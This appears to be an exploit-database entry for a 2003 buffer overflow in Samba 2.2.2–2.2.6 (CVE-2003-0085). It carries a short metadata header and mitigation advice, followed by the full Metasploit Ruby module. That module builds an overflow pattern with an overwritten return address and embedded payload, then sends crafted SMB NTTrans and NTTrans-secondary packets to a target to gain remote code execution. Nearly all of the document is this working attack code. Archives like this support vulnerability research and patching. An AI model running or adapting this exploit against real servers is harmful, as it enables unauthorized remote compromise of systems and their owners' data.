header-logo
Suggest Exploit
vendor:
Samba
by:
hdm
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Samba
Affected Version From: 2.2.2002
Affected Version To: 2.2.2006
Patch Exists: NO
Related CWE: CVE-2003-0085
CPE: a:samba:samba:2.2.2 cpe:/a:samba:samba:2.2.3 cpe:/a:samba:samba:2.2.4 cpe:/a:samba:samba:2.2.5 cpe:/a:samba:samba:2.2.6
Metasploit:
Other Scripts:
Platforms Tested: Linux
2003

Samba 2.2.2 – 2.2.6 nttrans Buffer Overflow

This module attempts to exploit a buffer overflow vulnerability present in versions 2.2.2 through 2.2.6 of Samba. The Samba developers report this as: 'Bug in the length checking for encrypted password change requests from clients.' The bug was discovered and reported by the Debian Samba Maintainers.

Mitigation:

Upgrade to a version of Samba that is not vulnerable to this issue. Alternatively, apply the relevant patches provided by the vendor.
Source

Exploit-DB raw data:

##
# $Id: nttrans.rb 9167 2010-04-28 03:54:24Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow',
			'Description'    => %q{
					This module attempts to exploit a buffer overflow vulnerability present in
				versions 2.2.2 through 2.2.6 of Samba.

				The Samba developers report this as:
				"Bug in the length checking for encrypted password change requests from clients."

				The bug was discovered and reported by the Debian Samba Maintainers.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9167 $',
			'References'     =>
				[
					[ 'CVE', '2003-0085' ],
					[ 'OSVDB', '6323' ],
					[ 'BID', '7106' ],
					[ 'URL', 'http://www.samba.org/samba/history/samba-2.2.7a.html' ]
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'MinNops'  => 512,
				},
			'Targets'        =>
				[
					[ "Samba 2.2.x Linux x86",
						{
							'Arch' => ARCH_X86,
							'Platform' => 'linux',
							'Rets' => [0x01020304, 0x41424344],
						},
					],
				],
			'DisclosureDate' => 'Apr 7 2003'
			))

		register_options(
			[
				Opt::RPORT(139)
			], self.class)
	end

	def exploit

		# 0x081fc968

		pattern = Rex::Text.pattern_create(12000)

		pattern[532, 4] = [0x81b847c].pack('V')
		pattern[836, payload.encoded.length] = payload.encoded

		# 0x081b8138

		connect
		smb_login

		targ_address = 0xfffbb7d0

		#
		# Send a NTTrans request with ParameterCountTotal set to the buffer length
		#

		subcommand   = 1
		param        = ''
		body         = ''
		setup_count  = 0
		setup_data   = ''
		data = param + body

		pkt = CONST::SMB_NTTRANS_PKT.make_struct
		self.simple.client.smb_defaults(pkt['Payload']['SMB'])

		base_offset = pkt.to_s.length + (setup_count * 2) - 4
		param_offset = base_offset
		data_offset = param_offset + param.length

		pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT
		pkt['Payload']['SMB'].v['Flags1'] = 0x18
		pkt['Payload']['SMB'].v['Flags2'] = 0x2001
		pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count

		pkt['Payload'].v['ParamCountTotal'] =12000
		pkt['Payload'].v['DataCountTotal'] = body.length
		pkt['Payload'].v['ParamCountMax'] = 1024
		pkt['Payload'].v['DataCountMax'] = 65504
		pkt['Payload'].v['ParamCount'] = param.length
		pkt['Payload'].v['ParamOffset'] = param_offset
		pkt['Payload'].v['DataCount'] = body.length
		pkt['Payload'].v['DataOffset'] = data_offset
		pkt['Payload'].v['SetupCount'] = setup_count
		pkt['Payload'].v['SetupData'] = setup_data
		pkt['Payload'].v['Subcommand'] = subcommand

		pkt['Payload'].v['Payload'] = data

		self.simple.client.smb_send(pkt.to_s)
		ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)

		#
		# Send a NTTrans secondary request with the magic displacement
		#

		param = pattern
		body  = ''
		data  = param + body

		pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct
		self.simple.client.smb_defaults(pkt['Payload']['SMB'])

		base_offset = pkt.to_s.length - 4
		param_offset = base_offset
		data_offset = param_offset + param.length

		pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY
		pkt['Payload']['SMB'].v['Flags1'] = 0x18
		pkt['Payload']['SMB'].v['Flags2'] = 0x2001
		pkt['Payload']['SMB'].v['WordCount'] = 18

		pkt['Payload'].v['ParamCountTotal'] = param.length
		pkt['Payload'].v['DataCountTotal'] = body.length
		pkt['Payload'].v['ParamCount'] = param.length
		pkt['Payload'].v['ParamOffset'] = param_offset
		pkt['Payload'].v['ParamDisplace'] = targ_address
		pkt['Payload'].v['DataCount'] = body.length
		pkt['Payload'].v['DataOffset'] = data_offset

		pkt['Payload'].v['Payload'] = data

		self.simple.client.smb_send(pkt.to_s)
		ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)


		handler

	end

end